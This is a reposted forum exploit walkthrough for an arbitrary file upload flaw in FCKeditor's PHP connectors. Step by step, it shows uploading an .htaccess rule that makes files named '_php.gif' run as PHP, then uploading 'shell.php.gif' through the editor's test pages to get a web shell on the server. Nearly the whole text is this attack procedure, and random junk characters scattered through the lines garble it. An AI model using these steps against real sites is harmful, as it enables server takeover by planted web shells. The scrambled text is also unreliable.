FCKeditor所有php版本Upload上传漏洞1 y- @& M" D: d& w# N" k
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
8 }5 L1 R: X: Y* X减小字体 增大字体. M' Q2 U/ V, r' M4 H4 ~
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability! Q' }* Q& |( k2 v. Z6 b2 P
[+] Date: 20115 ^+ b, b4 b/ E4 e! ?# Z* x
[+] Author : sinesafe.cn
1 h$ v4 t& D) r) _# L8 O[+] Website : WwW.sinesafe.cn
u: p% t5 G- x" k0 h/ D0 V———————————————————; n) h" ?, v- e( Z6 [
1.create a htaccess file:
% Q \7 x9 [9 F* L7 a- h8 A+ mcode:
8 w* j V1 w0 q<FilesMatch “_php.gif”>- K7 Z7 w5 N7 [) I6 }' g
SetHandler application/x-httpd-php0 Z- s4 s) P/ k, O- `
</FilesMatch>+ G; W+ @( C7 k9 n6 L. h1 G
" Y. L% T+ _/ {$ p2 u6 ~2.Now upload this htaccess with FCKeditor.
7 o- o C0 a4 S4 z8 ~
1 F6 X' h! _7 Q7 W- q4 ?, lhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html; `" P S* O& ?1 ?, E" S: L L
3 p% f) B) o! g* \# U4 `
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
+ l" V# G" {( g! f$ K
7 d& q% E4 k) D; d———————————————————————————————-% |+ j2 X: x/ l% V7 E2 h0 }
3.Now upload shell.php.gif with FCKeditor.
# ~+ W/ H/ j" d% K4 b4 |5 I" r4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
7 F1 O$ l, q$ o. I3 }5.http://www.sinesafe.cn/anything/shell_php.gif
. e0 [; h; J, J: [6.Now shell is available from server. |
! Y6 v+ O' D y: W+ e9 A
$ s! V; I0 W* z
0 e) O/ \+ P# k8 a0 k5 A |
发表于 2013-10-27 17:25:21
收藏
支持
反对